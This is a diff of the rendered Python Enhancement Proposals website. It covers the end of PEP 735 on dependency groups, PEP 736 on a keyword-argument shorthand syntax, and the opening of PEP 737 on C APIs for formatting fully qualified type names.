PDM supports specifying local paths, and editable installs, via a syntax which +looks like a set of arguments to pip install. For example, the following +dependency group includes a local package in editable mode:

+
[tool.pdm.dev-dependencies]
+mygroup = ["-e file:///${PROJECT_ROOT}/foo"]
+
+
+

This declares a dependency group mygroup which includes a local editable +install from the foo directory.

+

Poetry describes dependency groups as tables, mapping package names to +specifiers. For example, the same configuration as the above mygroup +example might appear as follows under Poetry:

+
[tool.poetry.group.mygroup]
+foo = { path = "foo", editable = true }
+
+
+

PDM restricts itself to a string syntax, and Poetry introduces tables which +describe dependencies.

+
+
+

Installing and Referring to Dependency Groups

+

Both PDM and Poetry have tool-specific support for installing dependency +groups. Because both projects support their own lockfile formats, they also +both have the capability to transparently use a dependency group name to refer +to the locked dependency data for that group.

+

However, neither tool’s dependency groups can be referenced natively from other +tools like tox, nox, or pip. +Attempting to install a dependency group under tox, for example, requires +an explicit call to PDM or Poetry to parse their dependency data and do the +relevant installation step.

+
+
+
+

Appendix C: Use Cases

+
+

Web Applications

+

A web application (e.g. a Django or Flask app) often does not need to build a +distribution, but bundles and ships its source to a deployment toolchain.

+

For example, a source code repository may define Python packaging metadata as +well as containerization or other build pipeline metadata (Dockerfile, +etc). +The Python application is built by copying the entire repository into a +build context, installing dependencies, and bundling the result as a machine +image or container.

+

Such applications have dependency groups for the build, but also for linting, +testing, etc. In practice, today, these applications often define themselves as +packages to be able to use packaging tools and mechanisms like extras to +manage their dependency groups. However, they are not conceptually packages, +meant for distribution in sdist or wheel format.

+

Dependency Groups allow these applications to define their various dependencies +without relying on packaging metadata, and without trying to express their +needs in packaging terms.

+
+
+

Libraries

+

Libraries are Python packages which build distributions (sdist and wheel) and +publish them to PyPI.

+

For libraries, Dependency Groups represent an alternative to extras for +defining groups of development dependencies, with the important advantages +noted above.

+

A library may define groups for test and typing which allow testing and +type-checking, and therefore rely on the library’s own dependencies (as +specified in [project.dependencies]).

+

Other development needs may not require installation of the package at all. For +example, a lint Dependency Group may be valid and faster to install without +the library, as it only installs tools like black, ruff, or flake8.

+

lint and test environments may also be valuable locations to hook in +IDE or editor support. See the case below for a fuller description of such +usage.

+

Here’s an example Dependency Groups table which might be suitable for a +library:

+
[dependency-groups]
+test = ["pytest<8", "coverage"]
+typing = ["mypy==1.7.1", "types-requests"]
+lint = ["black", "flake8"]
+typing-test = [{include-group = "typing"}, "pytest<8"]
+
+
+

Note that none of these implicitly install the library itself. +It is therefore the responsibility of any environment management toolchain to +install the appropriate Dependency Groups along with the library when needed, +as in the case of test.

+
+
+

Data Science Projects

+

Data Science Projects typically take the form of a logical collection of +scripts and utilities for processing and analyzing data, using a common +toolchain. Components may be defined in the Jupyter Notebook format (ipynb), +but rely on the same common core set of utilities.

+

In such a project, there is no package to build or install. Therefore, +pyproject.toml currently does not offer any solution for dependency +management or declaration.

+

It is valuable for such a project to be able to define at least one major +grouping of dependencies. For example:

+
[dependency-groups]
+main = ["numpy", "pandas", "matplotlib"]
+
+
+

However, it may also be necessary for various scripts to have additional +supporting tools. Projects may even have conflicting or incompatible tools or +tool versions for different components, as they evolve over time.

+

Consider the following more elaborate configuration:

+
[dependency-groups]
+main = ["numpy", "pandas", "matplotlib"]
+scikit = [{include-group = "main"}, "scikit-learn==1.3.2"]
+scikit-old = [{include-group = "main"}, "scikit-learn==0.24.2"]
+
+
+

This defines scikit and scikit-old as two similar variants of the +common suite of dependencies, pulling in different versions of scikit-learn +to suit different scripts.

+

This PEP only defines these data. It does not formalize any mechanism for a +Data Science Project (or any other type of project) to install the dependencies +into known environments or associate those environments with the various +scripts. Such combinations of data are left as a problem for tool authors to +solve, and perhaps eventually standardize.

+
+
+

Lockfile Generation

+

There are a number of tools which generate lockfiles in the Python ecosystem +today. PDM and Poetry each use their own lockfile formats, and pip-tools +generates requirements.txt files with version pins and hashes.

+

Dependency Groups are not an appropriate place to store lockfiles, as they lack +many of the necessary features. Most notably, they cannot store hashes, which +most lockfile users consider essential.

+

However, Dependency Groups are a valid input to tools which generate lockfiles. +Furthermore, PDM and Poetry both allow a Dependency Group name (under their +notions of Dependency Groups) to be used to refer to its locked variant.

+

Therefore, consider a tool which produces lockfiles, here called $TOOL. +It might be used as follows:

+
$TOOL lock --dependency-group=test
+$TOOL install --dependency-group=test --use-locked
+
+
+

All that such a tool needs to do is to ensure that its lockfile data records +the name test in order to support such usage.

+

The mutual compatibility of Dependency Groups is not guaranteed. For example, +the Data Science example above shows conflicting versions of scikit-learn. +Therefore, installing multiple locked dependency groups in tandem may require +that tools apply additional constraints or generate additional lockfile data. +These problems are considered out of scope for this PEP.

+

As two examples of how combinations might be locked:

+
    +
  • A tool might require that lockfile data be explicitly generated for any +combination to be considered valid
  • +
  • Poetry implements the requirement that all Dependency Groups be mutually +compatible, and generates only one locked version. (Meaning it finds a single +solution, rather than a set or matrix of solutions.)
  • +
+
+
+

Environment Manager Inputs

+

A common usage in tox, Nox, and Hatch is to install a set of dependencies into +a testing environment.

+

For example, under tox.ini, type checking dependencies may be defined +inline:

+
[testenv:typing]
+deps =
+    pyright
+    useful-types
+commands = pyright src/
+
+
+

This combination provides a desirable developer experience within a limited +context. Under the relevant environment manager, the dependencies which are +needed for the test environment are declared alongside the commands which need +those dependencies. They are not published in package metadata, as extras +would be, and they are discoverable for the tool which needs them to build the +relevant environment.

+

Dependency Groups apply to such usages by effectively “lifting” these +requirements data from a tool-specific location into a more broadly available +one. In the example above, only tox has access to the declared list of +dependencies. Under an implementation supporting dependency groups, the same +data might be available in a Dependency Group:

+
[dependency-groups]
+typing = ["pyright", "useful-types"]
+
+
+

The data can then be used under multiple tools. For example, tox might +implement support as dependency_groups = typing, replacing the deps +usage above.

+

In order for Dependency Groups to be a viable alternative for users of +environment managers, the environment managers will need to support processing +Dependency Groups similarly to how they support inline dependency declaration.

+
+
+

IDE and Editor Use of Requirements Data

+

IDE and editor integrations may benefit from conventional or configurable name +definitions for Dependency Groups which are used for integrations.

+

There are at least two known scenarios in which it is valuable for an editor or +IDE to be capable of discovering the non-published dependencies of a project:

+
    +
  • testing: IDEs such as VS Code support GUI interfaces for running particular +tests
  • +
  • linting: editors and IDEs often support linting and autoformatting +integrations which highlight or autocorrect errors
  • +
+

These cases could be handled by defining conventional group names like +test, lint, and fix, or by defining configuration mechanisms which +allow the selection of Dependency Groups.

+

For example, the following pyproject.toml declares the three aforementioned +groups:

+
[dependency-groups]
+test = ["pytest", "pytest-timeout"]
+lint = ["flake8", "mypy"]
+fix = ["black", "isort", "pyupgrade"]
+
+
+

This PEP makes no attempt to standardize such names or reserve them for such +uses. IDEs may standardize or may allow users to configure the group names used +for various purposes.

+

This declaration allows the project author’s knowledge of the appropriate tools +for the project to be shared with all editors of that project.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0735.rst

+

Last modified: 2024-10-16 16:05:18 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0736/index.html b/pep-0736/index.html new file mode 100644 index 00000000000..80ac508cf25 --- /dev/null +++ b/pep-0736/index.html @@ -0,0 +1,745 @@ + + + + + + + + PEP 736 – Shorthand syntax for keyword arguments at invocation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 736 – Shorthand syntax for keyword arguments at invocation

+
+
Author:
+
Joshua Bambrick <jbambrick at google.com>, +Chris Angelico <rosuav at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
28-Nov-2023
+
Python-Version:
+
3.14
+
Post-History:
+
14-Oct-2023, +17-Jan-2024, +17-Jul-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to introduce syntactic sugar f(x=) for the common pattern +where a keyword argument has the same name as that of the variable corresponding +to its value f(x=x).

+
+
+

Motivation

+

Keyword argument syntax can become needlessly repetitive and verbose.

+

Consider the following call:

+
my_function(
+  my_first_variable=my_first_variable,
+  my_second_variable=my_second_variable,
+  my_third_variable=my_third_variable,
+)
+
+
+

The case of a keyword argument name matching the variable name of its value is +prevalent among Python libraries. This redundancy discourages use of named +arguments and reduces readability by increasing visual noise.

+
+
+

Rationale

+

There are two ways to invoke a function with arguments: by position and by +keyword. By being explicit, keyword arguments increase readability and +minimise the risk of inadvertent transposition. On the flipside, positional +arguments are often preferred simply to minimise verbosity and visual noise.

+

We contend that a simple syntactic sugar used to simplify this common pattern +would confer numerous benefits:

+
+

Encourages use of named arguments

+

By reducing the visual noise that established keyword argument syntax can cause, +this syntax would encourage the use of named arguments, thereby increasing +readability and reducing bugs from argument transposition.

+
+
+

Reduces verbosity

+

By minimising visual noise and in some cases lines of code, we can increase +readability.

+
+
+

Encourages consistent variable names

+

A common problem is that semantically identical variables have different names +depending on their contexts. This syntax would encourage authors to use the same +variable name when calling a function as the argument name, which would increase +consistency of variable names used and hence improve readability.

+
+
+

Highlights arguments not following this pattern

+

With the current syntax, function calls where many arguments are forwarded from +the local context can make other argument values easy to miss due to the visual +noise. For example:

+
add_middleware(
+    excluded_urls=excluded_urls,
+    server_request=server_request,
+    client_request=client_request,
+    client_response=client_response,
+    span_details=_get_span_details(),
+    tracer=tracer,
+    meter=meter,
+)
+
+
+

With this syntax, the exceptional arguments become easier to identify:

+
add_middleware(
+    excluded_urls=,
+    server_request=,
+    client_request=,
+    client_response=,
+    span_details=_get_span_details(),
+    tracer=,
+    meter=,
+)
+
+
+
+
+

Applicability to dictionary construction

+

This syntax can be applied to dictionary construction where a similar pattern +frequently occurs (where dictionary keys are identical the names of the +variables assigned as their values), {"x": x, "y": y} or dict(x=x, y=y). +With this feature, this can now also be trivially written as dict(x=, y=). +Whether to further support similar syntax in dictionary literals is an open +question beyond the scope of this PEP.

+
+
+
+

Specification

+

We propose to introduce syntactic sugar such that, if the value of a keyword +argument is omitted from a function invocation, the argument’s value is inferred +to be the variable matching that name at the invocation scope.

+

For example, the function invocation:

+
my_function(my_first_variable=, my_second_variable=, my_third_variable=)
+
+
+

Will be interpreted exactly equivalently to following in existing syntax:

+
my_function(
+  my_first_variable=my_first_variable,
+  my_second_variable=my_second_variable,
+  my_third_variable=my_third_variable,
+)
+
+
+

If no variable matches that name in the invocation scope, a NameError is +raised in an identical manner as would be with the established expanded syntax.

+

This proposal only pertains to function invocations; function definitions are +unaffected by the syntax change. All existing valid syntax is unchanged.

+
+
+

Backwards Compatibility

+

Only new syntax is added which was previously syntactically erroneous. No +existing valid syntax is modified. As such, the changes proposed are fully +backwards compatible.

+
+
+

Security Implications

+

There are no security implications for this change.

+
+
+

Prior Art

+

Python already possesses a very similar feature in f-string interpolation where +f'{x=}' is effectively expanded to f'x={x}' (see +related GitHub issue).

+

Several modern languages provide similar features during function invocation, +sometimes referred to as ‘punning’. For example:

+ +

Beyond function invocation specifically, more languages offer similar features:

+ +
+
+

Applicability

+

We analysed popular Python libraries from the last few years using +this script +to compute:

+
    +
  • The number of keyword arguments which were of the form f(x=x) at +invocation.
  • +
  • The percentage of keyword arguments which had the form f(x=x) at +invocation.
  • +
  • The number of lines of code which could be saved by using this syntactic sugar +to reduce the need for line wraps.
  • +
+

The purpose of this exercise was to compute statistics about the prevalence of +this pattern and should not be interpreted as a recommendation that the proposed +syntactic sugar should be applied universally.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
StatisticPolarsFastAPIRichHTTPX
Number of keyword arguments of the form f(x=x) at invocation1,6541,408566759
Percentage of keyword arguments of the form f(x=x) at invocation15.83%28.11%15.74%45.13%
Lines saved1703562117
+

Based on this, we note that the f(x=x) keyword argument pattern is +widespread, accounting for anywhere from 15% to just below half of all keyword +argument uses depending on the codebase.

+
+
+

Proposed Syntax

+

While this feature has been proposed on numerous occasions with several +different forms [1] [2] [3] [4] [5], [6] we have opted to advocate +for the f(x=) form for the following reasons:

+
    +
  • This feature has been proposed frequently over a ten year period with the +f(x=) or f(=x) being by far the most commonly suggested syntax [1] +[2] [6]. This strongly indicates that it is the most obvious notation.
  • +
  • The proposed syntax closely matches the f-string debug f'{var=}' syntax +(established Pythonic style) and serves an almost identical purpose.
  • +
  • The proposed syntax is exactly analogous to the Ruby keyword argument +syntactic sugar. See the +Ruby 3.1.0 release notes (search for “keyword arguments”).
  • +
  • The syntax is easy to implement as it is simple syntactic sugar.
  • +
  • When compared to the prefix form (see Rejected Ideas), this syntax +communicates “here is a parameter, go find its argument” which is more +appropriate given the semantics of named arguments.
  • +
  • A poll of Python developers +indicates that this is the most popular syntax among those proposed.
  • +
+
+
+

How to Teach This

+

To ease the communication of and search for this feature, it may also be +valuable to provide this feature with a name, such as ‘keyword argument +shorthand’.

+

Keen Python developers will likely hear about this feature through typical +information channels, such as newsboards, social media, mailing lists, online +forums, or word of mouth. Many more will encounter this feature while reading +code and noting the omission of the value in a keyword argument at invocation, +violating their expectations. We should ensure such developers have easy access +to documentation that explains the semantics of this feature and that this +documentation is easy to find when searching. For example, the +Python Glossary and +Tutorial +may be updated accordingly and reasonable keywords may be used to help with +search discoverability. +A StackOverflow question +could be written to help explain this feature to those searching for an +explanation.

+

A teacher may explain this feature to new Python programmers as, “where you see +an argument followed only by an equals sign, such as f(x=), this represents +a keyword argument where the name of the argument and its value are the same. +This can be written equivalently in the expanded notation, f(x=x).” +Depending on a student’s background, a teacher might further compare this to +equivalent syntax in other languages or to Python’s f-string syntax f"{x=}".

+

To understand this, a student of Python would need to be familiar with the +basics of functions in addition to the existing keyword argument syntax. +Given that this feature is a relatively straightforward syntactic sugar, it is +reasonable that a student who possesses a grasp of keyword arguments will be +able to absorb this concept quickly. This is evidenced by the success of the +f-string syntax as well as similar features in other languages (see +Prior Art).

+
+
+

Rejected Ideas

+

Many alternative syntaxes have been proposed however no form other than +f(=x) or f(x=) has garnered significant support. We here enumerate some +of the most popular proposed alternatives and why we ultimately reject them.

+
+

f(a, b, *, x)

+

On a few occasions the idea has been floated to borrow the syntax from +keyword-only function definitions.

+

In favour of this proposal:

+
    +
  • This syntax is familiar from its use to require keyword-only arguments in +function definitions.
  • +
  • A poll of Python developers +indicates that this is the second most popular syntax among those proposed.
  • +
+

However, we object that:

+
    +
  • For any given argument, it is less clear from local context whether it is +positional or named. The * could easily be missed in a long argument list +and named arguments may be read as positional or vice versa.
  • +
  • It is unclear whether keyword arguments for which the value was not elided may +follow the *. If so, then their relative position will be confusingly +arbitrary, but if not, then an arbitrary grouping is enforced between +different types of keyword arguments and reordering of arguments would be +necessary if only one name (the argument or its value) was changed.
  • +
  • The use of * in function calls is well established and this proposal would +introduce a new effect which could cause confusion. For example, +f(a, *x, y) would mean something different than f(a, *, x, y).
  • +
+
+
+

f(=x)

+

In favour of this form:

+
    +
  • The prefix operator is more similar to the established *args and +**kwargs syntax for function calls.
  • +
  • It draws more attention to itself when arguments are arranged vertically. In +particular, if the arguments are of different lengths it is harder to find the +equals sign at the end. Moreover, since Python is read left to right, the use +of this feature is clearer to the reader earlier on.
  • +
+

On the contrary:

+
    +
  • While the prefix version is visually louder, in practice, there is no need for +this feature to shout its presence any more than a typical named argument. By +the time we read to the = it is clear that the value is filled in +automatically just as the value is clear in the typical keyword argument case.
  • +
  • Semantically, this form communicates ‘here is a value, fill in the parameter’ +which is not what we want to convey.
  • +
  • It is less similar to f-string syntax.
  • +
  • It is less obvious that arbitrary expressions are invalid, for example, +f(=a + b), since such expressions are acceptable after the equals sign in +the current keyword argument syntax but not before it.
  • +
+
+
+

f(%x) or f(:x) or f(.x)

+

Several flavours of this syntax have been proposed with the prefix form +substituting another character for =. However, no such form has gained +traction and the choice of symbol seems arbitrary compared to =. +Additionally, there is less precedent in terms of existing language features +(such as f-string) or other languages (such as Ruby).

+
+
+
+

Objections

+

There are only a few hard objections to the introduction of this syntactic +sugar. Most of those not in favour of this feature are in the camp of ‘I +wouldn’t use it’. However, over the extensive conversations about this feature, +the following objections were the most common:

+
+

The syntax is ugly

+

This objection is the most common. On the contrary, we argue that:

+
    +
  • This objection is subjective and many community members disagree.
  • +
  • A nearly-identical syntax is already established for f-strings.
  • +
  • Programmers will, as ever, adjust over time.
  • +
+
+
+

The feature is confusing

+

We argue that:

+
    +
  • Introducing new features typically has this impact temporarily.
  • +
  • The syntax is very similar to the established f'{x=}' syntax.
  • +
  • The feature and syntax are familiar from other popular modern languages.
  • +
  • The expansion of x= to x=x is a trivial feature and inherently +significantly less complex than the popular *arg and **kwarg +expansions.
  • +
  • This particular syntactic form has been independently proposed on numerous +occasions, indicating that it is the most obvious [1] [2] [6].
  • +
+
+
+

The feature is not explicit

+

We recognise that, in an obvious sense, the argument value is ‘implicit’ in this +proposed syntax. However, we do not think that this is what the Zen of Python is +aiming to discourage.

+

In the sense that we take the Zen to be referring to, keyword arguments (for +example) are more explicit than positional arguments where the argument name is +omitted and impossible to tell from the local context. Conversely, the syntactic +sugar for integers x += 1 is not more implicit than x = x + 1 in this +sense, even though the variable is omitted from the right hand side, because it +is immediately obvious from the local context what it is.

+

The syntax proposed in this PEP is much more closely analogous to the x += 1 +example (although simpler since we do not propose to introduce a new operation). +Moreover, by removing the barrier of visual noise introduced by the existing +keyword argument syntax, this syntactic sugar will encourage the use of keyword +arguments over positional ones, making typical Python codebases more explicit in +general.

+
+
+

The feature adds another way of doing things

+

The same argument can be made against all syntax changes. This is a simple +syntactic sugar, much as x += 1 is sugar for x = x + 1 when x is an +integer. This isn’t tantamount to a ‘new way’ of passing arguments but a more +readable notation for the same way.

+
+
+

Renaming the variable in the calling context will break the code

+

A NameError would make the mistake clear in the large majority cases. There +may be confusion if a variable from a broader scope has the same name as the +original variable, so no NameError would be raised. However, this issue can +also occur with keyword arguments using the current syntax (although arguably, +this syntactic sugar could make it harder to spot). Moreover, having variables +with the same name in different scopes is broadly considered to be bad practice +and is discouraged by linters.

+

Code editors could highlight the issue based on static analysis – f(x=) is +exactly equivalent to writing f(x=x). If x does not exist, modern +editors have no problem highlighting the issue.

+
+
+

This syntax increases coupling

+

We recognise that, as ever, all syntax has the potential for misuse and so +should be applied judiciously to improve codebases. In this case, if a parameter +and its value have the same semantics in both contexts, that suggests that using +this syntax is appropriate and will help ameliorate the risk of unintentional +desynchronisation which harms readability.

+

However, if the two variables have different semantics, that suggests that this +feature should not be used (since it encourages consistency) or perhaps that one +or both of the variables should be renamed.

+
+
+
+

Recommendations for Using This Syntax

+

As with any other language feature, the programmer should exercise their own +judgement about whether it is prudent to use it in any given context. We do not +recommend enforcing a rule to use the feature in all cases where it may be +applicable, such as via lint rules or style guides.

+

As described in This syntax increases coupling, we propose that a reasonable +rule of thumb would be to use this in cases where a parameter and its argument +have the same semantics in order to reduce unintentional desynchronisation +without causing inappropriate coupling.

+
+
+

Impact on Editing

+
+

Using a plain text editor

+

Editing with a plain text editor should generally be unaffected.

+

When renaming a variable using a ‘Find-Replace’ method, where this syntax is +used the developer will come across the function argument at invocation (as they +would if this syntax was not used). At that point, they can, as usual, decide +whether to update the argument as well or expand to the full f(x=x) syntax.

+

As with the current syntax, a ‘Find-Replace All’ method would fail since the +keyword argument would not exist at function definition, in the vast majority +of cases.

+

If the developer leaves the argument name unchanged and forgets to update its +value, a NameError will typically be raised as described in +Renaming the variable in the calling context will break the code.

+
+
+

Proposals for IDEs

+

In response to community feedback, we include some suggestions regarding how +IDEs could handle this syntax. However, we defer to the domain experts +developing IDEs to use their discretion.

+

Most considerations are made simple by recognising that f(x=) is just +syntactic sugar for f(x=x) and should be treated the same as at present.

+
+

Highlighting NameErrors

+

IDEs typically offer a feature to highlight code that may cause a NameError. +We recommend that this syntax be treated similarly to the expanded form +f(x=x) to identify and highlight cases where the elided variable may not +exist. What visual cue may be used to highlight these cases may be the same or +different from that which would be used with the current syntax, depending on +the IDE.

+
+
+

Jump to definition

+

There are a few possible ways that a ‘jump to definition’ feature could be +implemented depending on the caret/cursor position.

+

One option is to:

+
    +
  • Jump to the argument in the function definition if the caret/cursor is on the +argument
  • +
  • Jump to the definition of the elided variable if the caret/cursor is on the +character following the = in our proposed syntax
  • +
+

Another, potentially complementary, option would be to expand the syntax +visually on mouseover and enable a Ctrl+Click (or Cmd+Click) to the +definition of the variable.

+
+
+

Highlighting other references

+

IDEs frequently highlight matching code references to the value at the current +caret/cursor position. With this shorthand syntax, when the caret/cursor is on +the argument name it may be valuable to either:

+
    +
  • Highlight both references to the argument and its value reflecting the fact +that this name now refers to both
  • +
  • Visually expand the syntax on mouseover (as above) and apply established +highlighting logic according to the cursor
  • +
+
+
+

Rename symbol

+

There are a few ways that IDEs may wish to support a ‘Rename symbol’ feature for +this syntax. For example, if the argument is being renamed, the IDE may:

+
    +
  • Also rename the variable used as its value in each calling context where this +syntax is used
  • +
  • Expand to use the full syntax to pass the unchanged variable as the value of +the renamed argument
  • +
  • Prompt the developer to select between the two above options
  • +
+

The last option seems to be the most preferable to reduce unintentional +desynchronisation of names while highlighting the changes to the programmer.

+
+
+
+
+

Reference Implementation

+

A proposed implementation +for CPython has been provided by @Hels15. We will extend this implementation to +add an AST node attribute indicating for keywords whether the value was elided. +Otherwise the AST will remain unchanged.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0736.rst

+

Last modified: 2024-12-06 14:12:05 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0737/index.html b/pep-0737/index.html new file mode 100644 index 00000000000..1b951c97468 --- /dev/null +++ b/pep-0737/index.html @@ -0,0 +1,698 @@ + + + + + + + + PEP 737 – C API to format a type fully qualified name | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 737 – C API to format a type fully qualified name

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Nov-2023
+
Python-Version:
+
3.13
+
Post-History:
+
29-Nov-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add new convenient C APIs to format a type fully qualified name. No longer +format type names differently depending on how types are implemented.

+

Recommend using the type fully qualified name in error messages and in +__repr__() methods in new C code. Recommend not truncating type +names in new C code.

+

Add %T, %#T, %N and %#N formats to +PyUnicode_FromFormat() to format the fully qualified, respectively, +of an object type and of a type.

+

Make C code safer by avoiding borrowed reference which can lead to +crashes. The new C API is compatible with the limited C API.

+
+
+

Rationale

+
+

Standard library

+

In the Python standard library, formatting a type name or the type name +of an object is a common operation to format an error message and to +implement a __repr__() method. There are different ways to format a +type name which give different outputs.

+

Example with the datetime.timedelta type:

+
    +
  • The type short name (type.__name__) and the type qualified name +(type.__qualname__) are 'timedelta'.
  • +
  • The type module (type.__module__) is 'datetime'.
  • +
  • The type fully qualified name is 'datetime.timedelta'.
  • +
  • The type representation (repr(type)) contains the fully qualified +name: <class 'datetime.timedelta'>.
  • +
+
+

Python code

+

In Python, type.__name__ gets the type short name, whereas +f"{type.__module__}.{type.__qualname__}" formats the type “fully +qualified name”. Usually, type(obj) or obj.__class__ are used to +get the type of the object obj. Sometimes, the type name is put +between quotes.

+

Examples:

+
    +
  • raise TypeError("str expected, not %s" % type(value).__name__)
  • +
  • raise TypeError("can't serialize %s" % self.__class__.__name__)
  • +
  • name = "%s.%s" % (obj.__module__, obj.__qualname__)
  • +
+

Qualified names were added to types (type.__qualname__) in Python +3.3 by PEP 3155 “Qualified name for classes and functions”.

+
+
+

C code

+

In C, the most common way to format a type name is to get the +PyTypeObject.tp_name member of the type. Example:

+
PyErr_Format(PyExc_TypeError, "globals must be a dict, not %.100s",
+             Py_TYPE(globals)->tp_name);
+
+
+

The type “fully qualified name” is used in a few places: +PyErr_Display(), type.__repr__() implementation, and +sys.unraisablehook implementation.

+

Using Py_TYPE(obj)->tp_name is preferred since it is more convenient +than calling PyType_GetQualName() which requires Py_DECREF(). +Moreover, PyType_GetQualName() was only added recently, in Python +3.11.

+

Some functions use %R (repr(type)) to format a type name, the +output contains the type fully qualified name. Example:

+
PyErr_Format(PyExc_TypeError,
+             "calling %R should have returned an instance "
+             "of BaseException, not %R",
+             type, Py_TYPE(value));
+
+
+
+
+
+

Using PyTypeObject.tp_name is inconsistent with Python

+

The PyTypeObject.tp_name member is different depending on the type +implementation:

+
    +
  • Static types and heap types in C: tp_name is the type fully +qualified name.
  • +
  • Python class: tp_name is the type short name (type.__name__).
  • +
+

So using Py_TYPE(obj)->tp_name to format an object type name gives +a different output depending if a type is implemented in C or in Python.

+

It goes against PEP 399 “Pure Python/C Accelerator Module +Compatibility Requirements” principles which recommends code behaves +the same way if written in Python or in C.

+

Example:

+
$ python3.12
+>>> import _datetime; c_obj = _datetime.date(1970, 1, 1)
+>>> import _pydatetime; py_obj = _pydatetime.date(1970, 1, 1)
+>>> my_list = list(range(3))
+
+>>> my_list[c_obj]  # C type
+TypeError: list indices must be integers or slices, not datetime.date
+
+>>> my_list[py_obj]  # Python type
+TypeError: list indices must be integers or slices, not date
+
+
+

The error message contains the type fully qualified name +(datetime.date) if the type is implemented in C, or the type short +name (date) if the type is implemented in Python.

+
+
+

Limited C API

+

The Py_TYPE(obj)->tp_name code cannot be used with the limited C +API, since the PyTypeObject members are excluded from the limited C +API.

+

The type name should be read using PyType_GetName(), +PyType_GetQualName() and PyType_GetModule() functions which are +less convenient to use.

+
+
+

Truncating type names in C

+

In 1998, when the PyErr_Format() function was added, the +implementation used a fixed buffer of 500 bytes. The function had the +following comment:

+
/* Caller is responsible for limiting the format */
+
+
+

In 2001, the function was modified to allocate a dynamic buffer on the +heap. Too late, the practice of truncating type names, like using the +%.100s format, already became a habit, and developers forgot why +type names are truncated. In Python, type names are not truncated.

+

Truncating type names in C but not in Python goes against PEP 399 +“Pure Python/C Accelerator Module Compatibility Requirements” principles +which recommends code behaves the same way if written in Python or in +C.

+

See the issue: Replace %.100s by %s in PyErr_Format(): the arbitrary +limit of 500 bytes is outdated (2011).

+
+
+
+

Specification

+
    +
  • Add PyType_GetFullyQualifiedName() function.
  • +
  • Add PyType_GetModuleName() function.
  • +
  • Add formats to PyUnicode_FromFormat().
  • +
  • Recommend using the type fully qualified name in error messages and +in __repr__() methods in new C code.
  • +
  • Recommend not truncating type names in new C code.
  • +
+
+

Add PyType_GetFullyQualifiedName() function

+

Add the PyType_GetFullyQualifiedName() function to get the fully +qualified name of a type: similar to +f"{type.__module__}.{type.__qualname__}", or type.__qualname__ +if type.__module__ is not a string or is equal to "builtins" or +is equal to "__main__".

+

API:

+
PyObject* PyType_GetFullyQualifiedName(PyTypeObject *type)
+
+
+

On success, return a new reference to the string. On error, raise an +exception and return NULL.

+
+
+

Add PyType_GetModuleName() function

+

Add the PyType_GetModuleName() function to get the module name of a +type (type.__module__ string). API:

+
PyObject* PyType_GetModuleName(PyTypeObject *type)
+
+
+

On success, return a new reference to the string. On error, raise an +exception and return NULL.

+
+
+

Add formats to PyUnicode_FromFormat()

+

Add the following formats to PyUnicode_FromFormat():

+
    +
  • %N formats the fully qualified name of a type, +similar to PyType_GetFullyQualifiedName(type); +N stands for type Name.
  • +
  • %T formats the type fully qualified name of an object’s type, +similar to PyType_GetFullyQualifiedName(Py_TYPE(obj)); +T stands for object Type.
  • +
  • %#N and %#T: the alternative form uses the colon separator +(:), instead of the dot separator (.), between the module name +and the qualified name.
  • +
+

For example, the existing code using tp_name:

+
PyErr_Format(PyExc_TypeError,
+             "__format__ must return a str, not %.200s",
+             Py_TYPE(result)->tp_name);
+
+
+

can be replaced with the %T format:

+
PyErr_Format(PyExc_TypeError,
+             "__format__ must return a str, not %T", result);
+
+
+

Advantages of the updated code:

+
    +
  • Safer C code: avoid Py_TYPE() which returns a borrowed reference.
  • +
  • The PyTypeObject.tp_name member is no longer read explicitly: the +code becomes compatible with the limited C API.
  • +
  • The formatted type name no longer depends on the type implementation.
  • +
  • The type name is no longer truncated.
  • +
+

Note: The %T format is used by time.strftime(), but not by +printf().

+
+
+

Formats Summary

+ + + + + + + + + + + + + + + + + +
C objectC typeFormat
%T%NType fully qualified name.
%#T%#NType fully qualified name, colon separator.
+
+
+

Recommend using the type fully qualified name

+

The type fully qualified name is recommended in error messages and in +__repr__() methods in new C code.

+

In non-trivial applications, it is likely to have two types with the +same short name defined in two different modules, especially with +generic names. Using the fully qualified name helps identifying the type +in an unambiguous way.

+
+
+

Recommend not truncating type names

+

Type names should not be truncated in new C code. For example, the +%.100s format should be avoided: use the %s format instead (or +%T format in C).

+
+
+
+

Implementation

+ +
+
+

Backwards Compatibility

+

Changes proposed in this PEP are backward compatible.

+

Adding new C APIs has no effect on the backward compatibility. Existing +C APIs are left unchanged. No Python API is changed.

+

Replacing the type short name with the type fully qualified name is only +recommended in new C code. No longer truncating type names is only +recommended in new C code. Existing code should be left unchanged and so +remains backward compatible. There is no recommendation for Python code.

+
+
+

Rejected Ideas

+
+

Add type.__fully_qualified_name__ attribute

+

Add type.__fully_qualified_name__ read-only attribute, the fully +qualified name of a type: similar to +f"{type.__module__}.{type.__qualname__}", or type.__qualname__ if +type.__module__ is not a string or is equal to "builtins" or is +equal to "__main__".

+

The type.__repr__() is left unchanged, it only omits the module if +the module is equal to "builtins".

+

This change was rejected by the Steering Council:

+
+
We can see the usefulness of the C API changes proposed by the PEP +and would likely accept those changes as is.

We see less justification for the Python level changes. We +especially question the need for __fully_qualified_name__.

+
+

Thomas Wouters added:

+
+
If there really is a desire for formatting types the exact same way +the C API does it, a utility function would make more sense to me, +personally, than type.__format__, but I think the SC could be +persuaded given some concrete use-cases.
+
+
+

Add type.__format__() method

